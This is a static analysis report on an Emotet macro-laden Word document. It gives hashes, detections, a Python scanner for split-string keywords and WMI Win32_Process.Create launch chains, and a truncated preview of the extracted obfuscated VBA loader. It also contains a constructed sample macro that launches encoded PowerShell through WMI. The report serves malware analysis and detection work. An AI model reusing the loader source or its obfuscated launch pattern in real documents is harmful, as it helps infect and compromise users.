Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 d4a17a6f7914a7ff…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 179.9 KB
Created: 2019-12-11 18:09:00
Authoring application: Microsoft Office Word
First seen: 2020-01-07
MD5: b6485bfb170918ad842e92d5d5b0fef7
SHA-1: db99c8e397ab0b87ce28e11a910ebc25fb733918
SHA-256: d4a17a6f7914a7ffe8ac6a89fd2d6ab1bf81efd1d87386444d7d76ab9dc011d4
Risk Score: 322

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1203 Exploitation for Client Execution

The sample contains VBA macros that run as soon as the document is opened with macros enabled: the module Zxxjxjovaqr defines a Document_Open handler, which in turn calls the function Noklzenjgrhgq. The macro code uses CreateObject together with a WMI moniker ('winmgmts') to reach the Win32_Process class and invoke .Create, so the secondary payload is started by the WMI provider host rather than as a direct child of the Word process. This is a long-standing Emotet loader pattern. The 'winmgmts' string is obfuscated by string splitting instead of appearing as one literal, and the extracted source shows the mechanism: the function Cokgnfjetbr assembles its string from the contents of a TextBox control (Zxxjxjovaqr.Jiiexslvagg, declared through the VB_Control attribute) and from several properties of the form Igrwxpojox, including a ControlTipText value. Everything else in the visible code is padding: loops of the form For x = y To 0 over never-assigned variables, meaningless arithmetic, and Select Case blocks whose branches have no effect.

Heuristics (8)

  • ClamAV: Doc.Downloader.Emotet-7446350-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-7446350-0
  • VBA macros detected [medium, 5 related findings] OLE_VBA_MACROS
    The document contains VBA macro code.
  • VBA WMI Win32_Process launcher [critical] OLE_VBA_WMI_PROCESS_CREATE
    The VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain; the WMI class name is often hidden through string concatenation or helper functions, and the launched process appears as a child of the WMI provider host rather than of the Office application, which breaks simple parent-child process detections.
  • Dangerous API name reassembled from split string literals [critical] OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    The VBA concatenates short string literals that reassemble a dangerous API, ProgID or LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting a name across string concatenation serves no purpose other than evading keyword scanning.
  • Document_Open macro [high] OLE_VBA_DOCOPEN
    The module defines a Document_Open handler, which Word runs automatically when the document is opened with macros enabled.
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    The macro calls CreateObject, which instantiates an arbitrary COM object by ProgID at run time.
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell, download or object-execution tokens. This catches documents whose macro survives only as p-code (as in VBA stomping), or where source extraction failed, so that no readable source is available.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. A URL is not a detection in itself; the per-URL label says which channel (macro, JS, link annotation, document body, ...) carried it.
    URL http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the standard DrawingML XML namespace URI found in any Office file that contains drawing objects; it is not a network indicator and should not be treated as an IOC.
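The two critical heuristics above (split-string keyword reassembly and the WMI Win32_Process.Create chain) can be reproduced with a small static scanner. The following is an added example written for this page; it is not code from the analysis platform or from oletools, and its keyword list, auto-exec procedure names and the SAMPLE_VBA macro it scans are constructed for illustration. It reassembles `&`/`+` concatenations of string literals and Chr() calls, including across VBA line continuations, flags keywords that exist only in the joined value and in none of the individual operands, and then checks the flattened text for the winmgmts + Win32_Process + .Create chain.

```python
import re

# Procedures that Word/Excel run without user interaction once macros are enabled.
AUTOEXEC_PROCS = {"document_open", "autoopen", "auto_open", "workbook_open",
                  "document_close", "autoclose", "auto_close", "autoexec"}

# Names that signal keyword-splitting when they appear only in a reassembled
# string and in none of its operands (hypothetical list, extend as needed).
DANGEROUS_KEYWORDS = ["winmgmts", "win32_process", "wscript.shell",
                      "scripting.filesystemobject", "shell.application",
                      "powershell", "urldownloadtofile", "msxml2.xmlhttp"]

# One concatenation operand: a VBA string literal ("" escapes a quote) or Chr(n)/ChrW(n)/Chr$(n).
PART = r'(?:"(?:[^"\r\n]|"")*"|Chr[W]?\$?\(\s*\d+\s*\))'
# Optional VBA line continuation: " _" at the end of a line, then the next line's indent.
CONT = r'(?:[ \t]*_[ \t]*\r?\n[ \t]*)?'
# Two or more operands joined by & or +, with continuations allowed around the operator.
CONCAT_RUN = re.compile(PART + r'(?:' + CONT + r'[ \t]*[&+]' + CONT + r'[ \t]*' + PART + r')+',
                        re.IGNORECASE)
PART_RE = re.compile(PART, re.IGNORECASE)
PROC_RE = re.compile(r'^[ \t]*(?:(?:Private|Public|Friend)\s+)?(?:Static\s+)?(?:Sub|Function)\s+(\w+)',
                     re.IGNORECASE | re.MULTILINE)


def decode_part(part):
    """Characters contributed by one operand: the literal's text or the Chr() code point."""
    if part.startswith('"'):
        return part[1:-1].replace('""', '"')
    return chr(int(re.search(r'\d+', part).group()))


def decode_run(run_text):
    """Split one concatenation run into its decoded operands and their joined value."""
    parts = [decode_part(p) for p in PART_RE.findall(run_text)]
    return "".join(parts), parts


def find_autoexec(vba_source):
    """Names of procedures Office fires automatically (Document_Open, AutoOpen, ...)."""
    return sorted({n for n in PROC_RE.findall(vba_source) if n.lower() in AUTOEXEC_PROCS})


def split_keyword_hits(vba_source):
    """(keyword, reassembled string) pairs where the keyword is present in the joined
    value but in no single operand, i.e. it was split on purpose to defeat keyword scans."""
    hits = []
    for m in CONCAT_RUN.finditer(vba_source):
        joined, parts = decode_run(m.group(0))
        low = joined.lower()
        for kw in DANGEROUS_KEYWORDS:
            if kw in low and not any(kw in p.lower() for p in parts):
                hits.append((kw, joined))
    return hits


def flatten_literals(vba_source):
    """Rewrite every concatenation run as the single literal it evaluates to, so plain
    keyword rules can be run over de-obfuscated text."""
    def repl(m):
        joined, _ = decode_run(m.group(0))
        return '"' + joined.replace('"', '""') + '"'
    return CONCAT_RUN.sub(repl, vba_source)


def wmi_process_chain(vba_source):
    """True when the flattened source contains the winmgmts moniker, the Win32_Process
    class and a .Create call: the WMI process-launch chain flagged above."""
    flat = flatten_literals(vba_source).lower()
    return all(re.search(p, flat) for p in (r'winmgmts', r'win32_process', r'\.create\b'))


# Constructed sample macro (not the page's extracted code): split literals, a Chr()
# fragment, a line continuation and a WMI Win32_Process.Create launch of a payload.
SAMPLE_VBA = '''Attribute VB_Name = "ThisDocument"
Private Sub Document_Open()
    Dim a, b, c
    a = "winm" & "gmts:" & _
        "Win32_" & "Proc" & Chr(101) & "ss"
    b = "pow" + "ersh" + "ell -enc AAAA"
    Set c = GetObject(a)
    c.Create b, Null, Null, pid
End Sub
'''

if __name__ == "__main__":
    print("auto-exec entry points:", find_autoexec(SAMPLE_VBA))
    for kw, s in split_keyword_hits(SAMPLE_VBA):
        print(f"split keyword {kw!r} reassembled as {s!r}")
    print("WMI Win32_Process.Create chain:", wmi_process_chain(SAMPLE_VBA))
```

Two caveats for using this against a sample like the one on this page. First, the macro here does not concatenate literals at all: it pulls its fragments from UserForm control values (a TextBox's contents and a ControlTipText property), so a literal-only scanner finds nothing in the VBA source and the strings stored in the form streams have to be recovered and fed through the same keyword checks. Second, the p-code heuristic exists precisely because the decompressed source can be absent or stomped; when `olevba` extraction fails, run the token checks over the compiled stream instead of trusting an empty source listing.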

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 7782 bytes
SHA-256: 0cc6c5fff31f06bb0fcecd99705886e9240caced31af054ae6963550a269f902
Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "Zxxjxjovaqr"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Jiiexslvagg, 0, 0, MSForms, TextBox"
Private Sub Document_open()
   For Kwasugscio = Wssocfvav To 0
         Tluashoohrfo = (13 - Atn(51) - (44 + Round(41) * Tzofedkbbbv / CInt(1)))
    Select Case Fplwrpdhhzfz
      Case Zrqqdcyifhuq
         Rjsfhoizwv = CLng(Mimzigkjkjkkr)
         Wjdbaztpxgar = Oct(Avvcfqqwfy)
      Case Hyiyioyul
         Tozssotioexj = Imrdadfntrv
         Ymtlalcbofyyh = Int(29)
   End Select
Next
   For Jvqetsoxiw = Dsylppwhvjdr To 0
         Gnxtrwdj = (13 - Atn(51) - (44 + Round(41) * Zthdxlpm / CInt(1)))
    Select Case Ohjfclbn
      Case Rzrplaapeiotz
         Wiskjurxjp = CLng(Rqgupvtm)
         Rrwkahlp = Oct(Ptgciddfz)
      Case Amxizxnyy
         Kuqanztjl = Roxjdlmromyt
         Zcajyrwbh = Int(29)
   End Select
Next
   For Qxigwrndrv = Fftcfouumz To 0
         Ulupyceclgmoz = (13 - Atn(51) - (44 + Round(41) * Fdzgtofux / CInt(1)))
    Select Case Eilmxrhmlk
      Case Foqcyzsfcgipr
         Whorwnmxvrzi = CLng(Nnuiftrdm)
         Fvjxavvkykex = Oct(Ktqvlzrw)
      Case Tnhltatvhxr
         Avvdxxwi = Huabhaic
         Uemojqxrjqwjs = Int(29)
   End Select
Next
Noklzenjgrhgq
End Sub

Attribute VB_Name = "Igrwxpojox"
Attribute VB_Base = "0{E9ACC331-1C1F-49A3-9AE2-A44C2C08BCCB}{53B82310-DCAF-4DEE-A010-40008718495E}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Vqilggfbgzoi"
Function Cokgnfjetbr()
   For Jrbkbykicxea = Alwiwhxrndni To 0
         Erbxozgrz = (13 - Atn(51) - (44 + Round(41) * Zwugekizljboq / CInt(1)))
    Select Case Ysexwsvfel
      Case Mpkjlukwk
         Jteirudclt = CLng(Oncfferq)
         Cwkbaqtghb = Oct(Udskdlaik)
      Case Owwipertlp
         Hyptnjfmagg = Nvafqmypmwfeh
         Pijrumkl = Int(29)
   End Select
Next
Ofhabstutwn = Zxxjxjovaqr.Jiiexslvagg
   For Ywizgamajl = Rjlcnuycrtwv To 0
         Xyuhoxspf = (13 - Atn(51) - (44 + Round(41) * Czxnzvnv / CInt(1)))
    Select Case Eflitkzufana
      Case Nfcwyacd
         Kvapsyiz = CLng(Ttjyuntuavo)
         Vztsrxxo = Oct(Lxyjjbgroyg)
      Case Wdblgidvljtf
         Frcecsfxaweks = Acvlgxop
         Gxtaofdtdba = Int(29)
   End Select
Next
Xeoehzegejesb = Ofhabstutwn + Igrwxpojox.Bgdqgfncxa + Igrwxpojox.Dxefrbwwqi + Igrwxpojox.Pvpdqeawxls
   For Rimidsbjxo = Vxoqumtjbhqz To 0
         Jmcnuvnep = (13 - Atn(51) - (44 + Round(41) * Kldwwdegmwo / CInt(1)))
    Select Case Nwnuijrmdxj
      Case Jtagrirck
         Mfelsrjuinz = CLng(Svffbgnui)
         Kggfgnldvxid = Oct(Tmopgtjwr)
      Case Clbdnveqkaml
         Ucwckksazhu = Bujopskdb
         Hcdmufhakblrn = Int(29)
   End Select
Next
Afwzgyujsgkf = Xeoehzegejesb + Igrwxpojox.Sbdlnwzbyge + Igrwxpojox.Kzrigfrssqbfk.ControlTipText
   For Ymxdevkske = Awanynbwdehm To 0
         Ybrhksfdyy = (13 - Atn(51) - (44 + Round(41) * Bwdlbfjjfew / CInt(1)))
    Select Case Yzsiuflhsxj
      Case Ucowxbyj
         Ssdccmfue = CLng(Ltmuetehiyu)
         Khvjgvthmtaqq = Oct(Vndebmjjb)
      Case Hubegyhfrvrw
         Fiyzmenrvm = Pjlbxthonzgh
         Ilkmdqpv = Int(29)
   End Select
Next
Cokgnfjetbr = Xoiomcuxhsgbs + Afwzgyujsgkf + Xoiomcuxhsgbs
   For Dotyhzsa = Pllswdzhw To 0
         Wacjpzlmqt = (13 - Atn(51) - (44 + Round(41) * Ccqvmdyqtwkh / CInt(1)))
    Select Case Aoolcpor
      Case Rpszgnsmtqi
         Hndxoszqu = CLng(Zxxerggkvce)
         Zjfeyoerji = Oct(Yszyhxwadajqn)
      Case Jyvdcpsyfnu
         Kxpopgtng = Eixiyzordau
         Efiftulmfpp = Int(29)
   End Select
Next
End Function
Function Noklzenjgrhgq()
   For Wdzirawoqgjhc = Ycovyvxgjdnh To 0
       
... (truncated)